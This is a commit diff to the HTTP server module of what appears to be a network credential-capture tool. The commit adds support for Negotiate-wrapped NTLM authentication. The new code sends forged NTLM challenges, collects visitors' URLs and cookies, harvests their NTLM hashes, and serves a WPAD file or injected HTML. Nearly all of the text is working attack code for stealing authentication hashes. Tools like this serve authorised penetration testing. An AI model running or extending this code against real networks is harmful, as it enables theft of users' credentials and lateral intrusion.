Fixed issue in http srv, more hashes & signature reduction.

2025-07-16 10:02:53 -07:00 · 2024-01-04 17:11:14 -03:00 · 2024-01-04 17:11:14 -03:00 · 66ee7f8f08
commit 66ee7f8f08
parent 08e44d72ac
3 changed files with 147 additions and 35 deletions
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@ -167,6 +167,7 @@ def GrabURL(data, host):
 # Handle HTTP packet sequence.
 def PacketSequence(data, client, Challenge):
 	NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
+	NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
 	Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)

 	# Serve the .exe if needed
@ -193,7 +194,7 @@ def PacketSequence(data, client, Challenge):
 			Buffer.calculate()

 			Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
-			#Buffer_Ans.calculate(Buffer)
+			Buffer_Ans.calculate()
 			return Buffer_Ans

 		if Packet_NTLM == b'\x03':
@ -212,6 +213,36 @@ def PacketSequence(data, client, Challenge):
 				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
 				Buffer.calculate()
 				return Buffer
+				
+	elif NTLM_Auth2:
+		Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
+		if Packet_NTLM == b'\x01':
+			GrabURL(data, client)
+			#GrabReferer(data, client)
+			GrabCookie(data, client)
+
+			Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+			Buffer.calculate()
+			Buffer_Ans = IIS_NTLM_Challenge_Ans(WWWAuth = "WWW-Authenticate: Negotiate ", Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
+			Buffer_Ans.calculate()
+			return Buffer_Ans
+
+		if Packet_NTLM == b'\x03':
+			NTLM_Auth = b64decode(''.join(NTLM_Auth2))
+			if IsWebDAV(data):
+                                 module = "WebDAV"
+			else:
+                                 module = "HTTP"
+			ParseHTTPHash(NTLM_Auth, Challenge, client, module)
+
+			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
+				print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
+
+				return WPAD_Custom
+			else:
+				Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
+				Buffer.calculate()
+				return Buffer

 	elif Basic_Auth:
 		ClearText_Auth = b64decode(''.join(Basic_Auth))
@ -239,12 +270,16 @@ def PacketSequence(data, client, Challenge):
 			return Buffer
 	else:
 		if settings.Config.Basic:
-			Response = IIS_Basic_401_Ans()
+			r = IIS_Basic_401_Ans()
+			r.calculate()
+			Response = r
 			if settings.Config.Verbose:
 				print(text("[HTTP] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))

 		else:
-			Response = IIS_Auth_401_Ans()
+			r = IIS_Auth_401_Ans()
+			r.calculate()
+			Response = r
 			if settings.Config.Verbose:
 				print(text("[HTTP] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))